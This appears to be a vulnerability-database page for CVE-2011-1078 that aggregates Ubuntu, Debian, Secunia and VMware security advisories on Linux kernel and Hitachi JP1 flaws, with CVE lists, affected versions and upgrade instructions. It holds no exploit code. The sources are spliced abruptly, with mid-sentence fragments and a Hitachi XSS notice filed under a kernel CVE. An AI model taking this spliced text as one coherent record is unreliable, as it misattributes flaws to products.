It was discovered that CIFS incorrectly handled authentication. When a user had a CIFS share mounted that required authentication, a local user could mount the same share without knowing the correct password. (CVE-2011-1585)

It was discovered that the GRE protocol incorrectly handled netns initialization. A remote attacker could send a packet while the ip_gre module was loading, and crash the system, leading to a denial of service. (CVE-2011-1767)

It was discovered that the IP/IP protocol incorrectly handled netns initialization. A remote attacker could send a packet while the ipip module was loading, and crash the system, leading to a denial of service. (CVE-2011-1768)

Ben Greear discovered that CIFS did not correctly handle direct I/O. A local attacker with access to a CIFS partition could exploit this to crash the system, leading to a denial of service. (CVE-2011-1771)

Timo Warns discovered that the EFI GUID partition table was not correctly parsed. A physically local attacker that could insert mountable devices could exploit this to crash the system or possibly gain root privileges. (CVE-2011-1776)

Vasiliy Kulikov and Dan Rosenberg discovered that ecryptfs did not correctly check the origin of mount points. A local attacker could exploit this to trick the system into unmounting arbitrary mount points, leading to a denial of service. (CVE-2011-1833)

Andrea Righi discovered a race condition in the KSM memory merging support. If KSM was being used, a local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2183)

Dan Rosenberg discovered that the IPv4 diagnostic routines did not correctly validate certain requests. A local attacker could exploit this to consume CPU resources, leading to a denial of service. (CVE-2011-2213)

It was discovered that an mmap() call with the MAP_PRIVATE flag on "/dev/zero" was incorrectly handled. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2479)

Vasiliy Kulikov discovered that taskstats listeners were not correctly handled. A local attacker could expoit this to exhaust memory and CPU resources, leading to a denial of service. (CVE-2011-2484)

Vasily Averin discovered that the NFS Lock Manager (NLM) incorrectly handled unlock requests. A local attacker could exploit this to cause a denial of service. (CVE-2011-2491)

It was discovered that Bluetooth l2cap and rfcomm did not correctly initialize structures. A local attacker could exploit this to read portions of the kernel stack, leading to a loss of privacy. (CVE-2011-2492)

Sami Liedes discovered that ext4 did not correctly handle missing root inodes. A local attacker could trigger the mount of a specially crafted filesystem to cause the system to crash, leading to a denial of service. (CVE-2011-2493)

Vasiliy Kulikov discovered that taskstats did not enforce access restrictions. A local attacker could exploit this to read certain information, leading to a loss of privacy. (CVE-2011-2494)

Vasiliy Kulikov discovered that /proc/PID/io did not enforce access restrictions. A local attacker could exploit this to read certain information, leading to a loss of privacy. (CVE-2011-2495)

Robert Swiecki discovered that mapping extensions were incorrectly handled. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2496)

Dan Rosenberg discovered that the Bluetooth stack incorrectly handled certain L2CAP requests. If a system was using Bluetooth, a remote attacker could send specially crafted traffic to crash the system or gain root privileges. (CVE-2011-2497)

It was discovered that the wireless stack incorrectly verified SSID lengths. A local attacker could exploit this to cause a denial of service or gain root privileges. (CVE-2011-2517)

Ben Pfaff discovered that Classless Queuing Disciplines (qdiscs) were being incorrectly handled. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2525)

It was discovered that GFS2 did not correctly check block sizes. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2689)

It was discovered that the EXT4 filesystem contained multiple off-by-one flaws. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2695)

Fernando Gont discovered that the IPv6 stack used predictable fragment identification numbers. A remote attacker could exploit this to exhaust network resources, leading to a denial of service. (CVE-2011-2699)

Mauro Carvalho Chehab discovered that the si4713 radio driver did not correctly check the length of memory copies. If this hardware was available, a local attacker could exploit this to crash the system or gain root privileges. (CVE-2011-2700)

Herbert Xu discovered that certain fields were incorrectly handled when Generic Receive Offload (CVE-2011-2723)

Christian Ohm discovered that the perf command looks for configuration files in the current directory. If a privileged user were tricked into running perf in a directory containing a malicious configuration file, an attacker could run arbitrary commands and possibly gain privileges. (CVE-2011-2905)

Vasiliy Kulikov discovered that the Comedi driver did not correctly clear memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2011-2909)

The performance counter subsystem did not correctly handle certain counters. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2918)

Time Warns discovered that long symlinks were incorrectly handled on Be filesystems. A local attacker could exploit this with a malformed Be filesystem and crash the system, leading to a denial of service. (CVE-2011-2928)

Qianfeng Zhang discovered that the bridge networking interface incorrectly handled certain network packets. A remote attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2942)

Dan Kaminsky discovered that the kernel incorrectly handled random sequence number generation. An attacker could use this flaw to possibly predict sequence numbers and inject packets. (CVE-2011-3188)

Darren Lavender discovered that the CIFS client incorrectly handled certain large values. (CVE-2011-3191)

Yasuaki Ishimatsu discovered a flaw in the kernel's clock implementation. A local unprivileged attacker could exploit this causing a denial of service. (CVE-2011-3209)

Yogesh Sharma discovered that CIFS did not correctly handle UNCs that had no prefixpaths. A local attacker with access to a CIFS partition could exploit this to crash the system, leading to a denial of service. (CVE-2011-3363)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 10.04 LTS: linux-image-2.6.38-12-generic 2.6.38-12.51~lucid1 linux-image-2.6.38-12-generic-pae 2.6.38-12.51~lucid1 linux-image-2.6.38-12-server 2.6.38-12.51~lucid1 linux-image-2.6.38-12-virtual 2.6.38-12.51~lucid1

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: http://www.ubuntu.com/usn/usn-1256-1 CVE-2011-1020, CVE-2011-1078, CVE-2011-1079, CVE-2011-1080, CVE-2011-1093, CVE-2011-1160, CVE-2011-1180, CVE-2011-1478, CVE-2011-1479, CVE-2011-1493, CVE-2011-1573, CVE-2011-1576, CVE-2011-1577, CVE-2011-1581, CVE-2011-1585, CVE-2011-1767, CVE-2011-1768, CVE-2011-1771, CVE-2011-1776, CVE-2011-1833, CVE-2011-2183, CVE-2011-2213, CVE-2011-2479, CVE-2011-2484, CVE-2011-2491, CVE-2011-2492, CVE-2011-2493, CVE-2011-2494, CVE-2011-2495, CVE-2011-2496, CVE-2011-2497, CVE-2011-2517, CVE-2011-2525, CVE-2011-2689, CVE-2011-2695, CVE-2011-2699, CVE-2011-2700, CVE-2011-2723, CVE-2011-2905, CVE-2011-2909,

Package Information: https://launchpad.net/ubuntu/+source/linux-lts-backport-natty/2.6.38-12.51~lucid1

. (CVE-2010-4242)

Brad Spengler discovered that the kernel did not correctly account for userspace memory allocations during exec() calls. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA-2240-1 security@debian.org http://www.debian.org/security/ dann frazier May 24, 2011 http://www.debian.org/security/faq


Package : linux-2.6 Vulnerability : privilege escalation/denial of service/information leak Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2010-3875 CVE-2011-0695 CVE-2011-0711 CVE-2011-0726 CVE-2011-1016 CVE-2011-1078 CVE-2011-1079 CVE-2011-1080 CVE-2011-1090 CVE-2011-1160 CVE-2011-1163 CVE-2011-1170 CVE-2011-1171 CVE-2011-1172 CVE-2011-1173 CVE-2011-1180 CVE-2011-1182 CVE-2011-1476 CVE-2011-1477 CVE-2011-1478 CVE-2011-1493 CVE-2011-1494 CVE-2011-1495 CVE-2011-1585 CVE-2011-1593 CVE-2011-1598 CVE-2011-1745 CVE-2011-1746 CVE-2011-1748 CVE-2011-1759 CVE-2011-1767 CVE-2011-1770 CVE-2011-1776 CVE-2011-2022 Debian Bug(s) :

Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2010-3875

Vasiliy Kulikov discovered an issue in the Linux implementation of the
Amateur Radio AX.25 Level 2 protocol.

CVE-2011-0695

Jens Kuehnel reported an issue in the InfiniBand stack. Local
users could learn the text location of a process, defeating protections
provided by address space layout randomization (ASLR).

CVE-2011-1016

Marek Olšák discovered an issue in the driver for ATI/AMD Radeon video
chips. Local users could pass arbitrary values to video memory and the
graphics translation table, resulting in denial of service or escalated
privileges. On default Debian installations, this is exploitable only by
members of the 'video' group.

CVE-2011-1080

Vasiliy Kulikov discovered an issue in the Netfilter subsystem.

CVE-2011-1160

Peter Huewe reported an issue in the Linux kernel's support for TPM security
chips.

CVE-2011-1163

Timo Warns reported an issue in the kernel support for Alpha OSF format disk
partitions.

CVE-2011-1170

Vasiliy Kulikov reported an issue in the Netfilter arp table
implementation.

CVE-2011-1171

Vasiliy Kulikov reported an issue in the Netfilter IP table
implementation.

CVE-2011-1172

Vasiliy Kulikov reported an issue in the Netfilter IP6 table
implementation.

CVE-2011-1173

Vasiliy Kulikov reported an issue in the Acorn Econet protocol
implementation.

CVE-2011-1180

Dan Rosenberg reported a buffer overflow in the Information Access Service
of the IrDA protocol, used for Infrared devices.

CVE-2011-1182

Julien Tinnes reported an issue in the rt_sigqueueinfo interface. Local
users can generate signals with falsified source pid and uid information.

CVE-2011-1476

Dan Rosenberg reported issues in the Open Sound System MIDI interface that
allow local users to cause a denial of service. This issue does not affect
official Debian Linux image packages as they no longer provide support for
OSS.  However, custom kernels built from Debians linux-source-2.6.32 may
have enabled this configuration and would therefore be vulnerable.

CVE-2011-1477

Dan Rosenberg reported issues in the Open Sound System driver for cards that
include a Yamaha FM synthesizer chip. This issue does not affect
official Debian Linux image packages as they no longer provide support for
OSS.  However, custom kernels built from Debians linux-source-2.6.32 may
have enabled this configuration and would therefore be vulnerable.

CVE-2011-1478

Ryan Sweat reported an issue in the Generic Receive Offload (GRO) support in
the Linux networking subsystem.

CVE-2011-1493

Dan Rosenburg reported two issues in the Linux implementation of the Amateur
Radio X.25 PLP (Rose) protocol.

CVE-2011-1494

Dan Rosenberg reported an issue in the /dev/mpt2ctl interface provided by
the driver for LSI MPT Fusion SAS 2.0 controllers. On default Debian
installations this is not exploitable as this interface is only accessible
to root.

CVE-2011-1495

Dan Rosenberg reported two additional issues in the /dev/mpt2ctl interface
provided by the driver for LSI MPT Fusion SAS 2.0 controllers. On default Debian installations this is not
exploitable as this interface is only accessible to root.

CVE-2011-1585

Jeff Layton reported an issue in the Common Internet File System (CIFS).

CVE-2011-1598

Dave Jones reported an issue in the Broadcast Manager Controller Area
Network (CAN/BCM) protocol that may allow local users to cause a NULL
pointer dereference, resulting in a denial of service.

CVE-2011-1745

Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian
installations, this is exploitable only by users in the video group.

CVE-2011-1746

Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian installations, this is exploitable
only by users in the video group.

CVE-2011-1748

Oliver Kartkopp reported an issue in the Controller Area Network (CAN) raw
socket implementation which permits ocal users to cause a NULL pointer
dereference, resulting in a denial of service.

CVE-2011-1759

Dan Rosenberg reported an issue in the support for executing "old ABI"
binaries on ARM processors.

CVE-2011-1767

Alexecy Dobriyan reported an issue in the GRE over IP implementation.

CVE-2011-2022

Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian
installations, this is exploitable only by users in the video group.

This update also includes changes queued for the next point release of Debian 6.0, which also fix various non-security issues. These additional changes are described in the package changelog which can be viewed at:

http://packages.debian.org/changelogs/pool/main/l/linux-2.6/linux-2.6_2.6.32-34/changelog

For the stable distribution (squeeze), this problem has been fixed in version 2.6.32-34squeeze1. Updates for issues impacting the oldstable distribution (lenny) will be available soon.

The following matrix lists additional source packages that were rebuilt for compatibility with or to take advantage of this update:

                                         Debian 6.0 (squeeze)
 user-mode-linux                         2.6.32-1um-4+34squeeze1

We recommend that you upgrade your linux-2.6 and user-mode-linux packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)

iQIcBAEBAgAGBQJN3I4aAAoJEBv4PF5U/IZAaa4P/j+l40Mp6naHByZt3jpwNWSA RN/jkkrYnYNDyT7crB+/DOdu84zalYa2KqfffOd/faV9+NSCBayjJ5c+FvVgeTay Il8elfcWP/uK0BXJn2xVb7YAsLpIe0HRlhxe72ZqcT4Yxo1/IBnEpUS56JRd2tlA k7x7dbj+smlzlM4qiXQy1F6LNyDqoGDUKNohQHUoyQ5dGq/gdi3C7EnUs4Nx9vjK RU1HUWLXB4qm7JpoK6o3u6Hpe0ynZm74tYvTi0XhayGXGevaBvIQuEWqhY6gZF1P v6a5gvBQC2pRIQXAVUbAhjoXpuF5jahTgicLdJanDqLfhefQ3qV11Ahvui2lzZuT iKbMVGzO/azPLzskH8YNBq6drFPX2ZqRsxGmrTdzEtLWnJCN6nBBe4kF6C3z5T1A 1ez4/F+OhNl2wnimq3CxiyfXun9WWs6IlULpqsKgJjE4bItg5a8+zTYGjkhQxX+X fPzO1xZCtQK4i+59Ejs5FwIfps0fA0m8c1Z5bnIaj4Q+0X5sJt2kwws8yrQKoOH1 eKGOgRqM70rOnyW/TQtXDGnTC4+vCCv89UjZUpG+sxZtWUxeh8CL2scUyceTeSNC IS2+EgvilN+a3hQlYJH4YNshmQCtJDp7qMTLaXLHM9hoV1L383nbJV4AtrFlcsCO KRI5f0ds95H6TsEoTSmO =gx2x -----END PGP SIGNATURE-----


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201206-0026",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.38.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.38.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.38.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.38.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.38.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.38.4"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.38.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.38.7"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.5"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "jp1/it service level management manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "-09-50"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-50"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11-02"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-10-03"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-10"
      },
      {
        "model": "jp1/it service level management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-51"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-50-02"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11-05"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002827"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-404"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1078"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.6.38.8",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.38:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-1078"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hitachi",
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2011-1078",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 1.9,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.4,
            "id": "CVE-2011-1078",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.8,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2011-1078",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201206-404",
            "trust": 0.6,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002827"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-404"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1078"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The sco_sock_getsockopt_old function in net/bluetooth/sco.c in the Linux kernel before 2.6.39 does not initialize a certain structure, which allows local users to obtain potentially sensitive information from kernel stack memory via the SCO_CONNINFO option. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \nThe following products are affected:\nJP1/IT Resource Management - Manager\nJP1/IT Service Level Management - Manager. ----------------------------------------------------------------------\n\nSecunia is hiring!\n\nFind your next job here:\n\nhttp://secunia.com/company/jobs/\n\n----------------------------------------------------------------------\n\nTITLE:\nHitachi JP1/IT Service Level Management Unspecified Cross-Site\nScripting Vulnerability\n\nSECUNIA ADVISORY ID:\nSA47804\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/47804/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47804\n\nRELEASE DATE:\n2012-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/47804/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/47804/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47804\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Hitachi JP1/IT Service Level\nManagement, which can be exploited by malicious people to conduct\ncross-site scripting attacks. \n\nCertain unspecified input is not properly sanitised before being\nreturned to the user. \n\nThe vulnerability is reported in version 09-50. \n\nSOLUTION:\nUpdate to version 09-51. \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. \n\nORIGINAL ADVISORY:\nHitachi (English):\nhttp://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS12-005/index.html\n\nHitachi (Japanese):\nhttp://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-005/index.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n ----------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID: VMSA-2012-0001\nSynopsis:    VMware ESXi and ESX updates to third party library\n             and ESX Service Console\nIssue date:  2012-01-30\nUpdated on:  2012-01-30 (initial advisory)\n\nCVE numbers: --- COS Kernel ---\n             CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,\n             CVE-2011-1080, CVE-2011-1093, CVE-2011-1163,\n             CVE-2011-1166, CVE-2011-1170, CVE-2011-1171,\n             CVE-2011-1172, CVE-2011-1494, CVE-2011-1495,\n             CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,\n             CVE-2011-0695, CVE-2011-0711, CVE-2011-1044,\n             CVE-2011-1182, CVE-2011-1573, CVE-2011-1576,\n             CVE-2011-1593, CVE-2011-1745, CVE-2011-1746,\n             CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,\n             CVE-2011-2213, CVE-2011-2492, CVE-2011-1780,\n             CVE-2011-2525, CVE-2011-2689, CVE-2011-2482,\n             CVE-2011-2491, CVE-2011-2495, CVE-2011-2517,\n             CVE-2011-2519, CVE-2011-2901\n             --- COS cURL ---\n             CVE-2011-2192\n             --- COS rpm ---\n             CVE-2010-2059, CVE-2011-3378\n             --- COS samba ---\n             CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,\n             CVE-2011-2522, CVE-2011-2694\n             --- COS python ---\n             CVE-2009-3720, CVE-2010-3493, CVE-2011-1015,\n             CVE-2011-1521\n             --- python library ---\n             CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,\n             CVE-2010-2089, CVE-2011-1521\n ----------------------------------------------------------------------\n\n1. Summary\n\n   VMware ESXi and 